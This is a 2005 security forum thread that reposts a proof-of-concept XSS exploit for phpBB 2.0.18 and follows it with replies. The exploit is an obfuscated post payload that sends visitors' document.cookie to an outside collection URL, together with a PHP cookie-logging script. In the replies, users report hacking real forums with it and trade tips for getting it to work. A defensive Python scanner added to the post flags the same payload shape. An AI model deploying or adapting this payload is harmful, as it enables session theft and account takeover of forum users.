IT Security and Insecurity Portal

2.0.18 Proof

Posted: Fri Dec 23, 2005 12:20 am
syntax9 (Active user; Joined: Dec 21, 2005; Posts: 33)

 Topic : phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
 ExploitAlert Id : 193
 
 Credit : jet
 
 Date : 22.12.2005
 
 Exploit Code :
 
 # SecurityReason Source :
 # http://securityreason.com/achievement_securityalert/29
 # More : http://securityreason.com/achievement
 /******************************************************************
 
 phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
 -- 'the html is on exploit'
 
 original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
 -- http://securityreason.com/securityalert/269/
 proof of concept by: jet
 -- http://jet.carbon-4.net/
 
 develop a pure, lucid mind, not
 depending upon sound, flavor,
 touch, odor, or any quality.
 - the diamond sutra
 
 ******************************************************************/
 
 phpbb code:
 
 <B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));
 'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.s
 ss=null`style='font-size:0; X="<B ">'</B>
 
 c.php:
 
 <?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
 
 ?>
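
Added example, not part of the original post or of phpBB: a defender-side triage pass over stored post bodies for the payload shape shown above (raw HTML carrying a CSS `expression(` value, optionally reading `document.cookie`). The function names and the sample rows are assumptions constructed for illustration.

```python
import re

# The payload above uses /**/ in place of whitespace, so CSS/JS comments are
# removed before matching; a pattern then cannot be split by a comment.
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_TAG_OPEN = re.compile(r"<[a-z!/]", re.I)           # any raw HTML at all
_DYNAMIC_CSS = re.compile(r"expression\s*\(", re.I)  # IE dynamic property
_COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)


def normalise(body: str) -> str:
    """Strip comments so the signatures see contiguous tokens."""
    return _COMMENT.sub("", body)


def scan_post(body: str) -> list[str]:
    """Return the reasons one stored post body resembles the payload shape."""
    if not _TAG_OPEN.search(body):
        return []  # no tag-like text, so no attribute can carry the value
    text = normalise(body)
    reasons = []
    if _DYNAMIC_CSS.search(text):
        reasons.append("css-expression")
    if _COOKIE_READ.search(text):
        reasons.append("cookie-read")
    return reasons


def triage(posts: dict[int, str]) -> dict[int, list[str]]:
    """Map post_id -> reasons for every post that needs review."""
    flagged = {}
    for post_id, body in posts.items():
        reasons = scan_post(body)
        if reasons:
            flagged[post_id] = reasons
    return flagged


# Constructed sample rows (post_id -> stored post text), not real forum data.
SAMPLE_POSTS = {
    101: "Nice release, <b>thanks</b>!",
    102: "IE evaluates expression( in CSS and scripts can read document.cookie.",
    103: "<B C=\">\" style='top:expression(eval(this.sss));' "
         "sss=`void(document.cookie)`></B>",
}

if __name__ == "__main__":
    for post_id, reasons in triage(SAMPLE_POSTS).items():
        print(post_id, ", ".join(reasons))
```

Flagged rows are candidates for review, not proof of compromise. Per the thread, the payload depends on HTML being enabled in posts, and session cookies marked HttpOnly are not readable through `document.cookie`.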

Posted: Fri Dec 23, 2005 12:22 am
syntax9 (Active user; Joined: Dec 21, 2005; Posts: 33)

I cannot get it to work myself on 1 site; did not try others. If someone does, let me know.

Posted: Fri Dec 23, 2005 9:42 am
super (Active user; Joined: Sep 19, 2005; Posts: 30)

It's working nicely, one phpBB 2.0.18 site hacked by me using this exploit

Posted: Sat Dec 24, 2005 8:45 pm
syntax9 (Active user; Joined: Dec 21, 2005; Posts: 33)

Finally got this to work on the site I wanted it to, but only pulled my cookie. Suggestions?

Posted: Sat Dec 31, 2005 1:16 pm
WaterBird (Active user; Joined: May 16, 2005; Posts: 37)

syntax9 wrote:
> Finally got this to work on the site I wanted it to, but only pulled my cookie. Suggestions?

I think the forum you want to sploit doesn't have the HTML tags enabled.

Posted: Thu Jan 05, 2006 5:16 am
chuan (Regular user; Joined: Jan 05, 2006; Posts: 7)

Newbie here. Can teach me how to go about it?

Posted: Sat Jan 07, 2006 10:25 pm
rohit507 (Beginner; Joined: Dec 22, 2005; Posts: 3)

I am a true PHP newb but I have been reading up a little. Anyway, how would I write a cookie.php which will allow me to log multiple cookies and not overwrite the ones previously logged?

Posted: Sun Jan 08, 2006 12:45 am
syntax9 (Active user; Joined: Dec 21, 2005; Posts: 33)

Code:
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");

opens the file,
then writes to the files.

does not produce a new file, just edits the existing.
be sure to CHMOD the File 777 so the "target forum" can open and write to it.

GL

Posted: Sun Jan 08, 2006 4:19 am
chuan (Regular user; Joined: Jan 05, 2006; Posts: 7)

syntax9 wrote:
> Code:
> $fl = fopen('log.txt', 'a');
> fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
>
> opens the file,
> then writes to the files.
>
> does not produce a new file, just edits the existing.
> be sure to CHMOD the File 777 so the "target forum" can open and write to it.
>
> GL

??
Where to start? Can elaborate?